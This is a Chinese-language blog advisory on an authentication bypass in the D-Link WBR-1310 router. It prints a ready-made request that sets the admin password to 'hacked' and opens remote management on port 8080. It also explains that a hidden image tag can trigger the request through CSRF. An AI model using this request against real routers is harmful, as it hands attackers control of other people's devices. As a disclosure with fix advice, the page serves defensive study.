D-Link WBR-1310 Authentication Bypass Vulnerability

由 Atom_Kid · 发布日期八月 8, 2019 · 已更新八月 8, 2019

漏洞概述

WBR-1310允许远程用户修改管理配置进行授权绕过，在未开启远程管理时也可以通过CSRF触发。

影响产品

WBR-1310 V2.00

漏洞描述

CGI脚本未进行有效的登录凭据验证。可通过构造HTTP请求修改管理设置。

修改管理员密码为 hacked，并开启8080端口允许远程访问

http://192.168.0.1/tools_admin.cgi?
admname=admin&amp;admPass1=hacked&amp;admPass2=hacked&amp;username=user&amp;userPass1=WD
B8WvbXdHtZyM8&amp;userPass2=WDB8WvbXdHtZyM8&amp;hip1=*&amp;hport=8080&amp;hEnable=1

可通过CSRF漏洞发送GET请求触发

漏洞影响

允许远程管理，接管路由器

通过web页面隐藏image tag，触发链接修改管理员密码和允许远程连接

修复建议

升级固件

参考资料

http://www.devttys0.com/wp-content/uploads/2010/12/wbr310_auth_bypass.pdf

一	二	三	四	五	六	日
« 6月
						1
2	3	4	5	6	7	8
9	10	11	12	13	14	15
16	17	18	19	20	21	22
23	24	25	26	27	28	29
30

D-Link WBR-1310 Authentication Bypass Vulnerability

漏洞概述

影响产品

漏洞描述

漏洞影响

修复建议

参考资料

您可能还喜欢...

近期文章

分类目录

D-Link WBR-1310 Authentication Bypass Vulnerability

漏洞概述

影响产品

漏洞描述

漏洞影响

修复建议

参考资料

您可能还喜欢...

栈溢出jmp esp原理

MIPS缓冲区溢出 — exploit

TrendNet路由器登录信息泄露漏洞（CVE-2018-7034）分析实战

近期文章

分类目录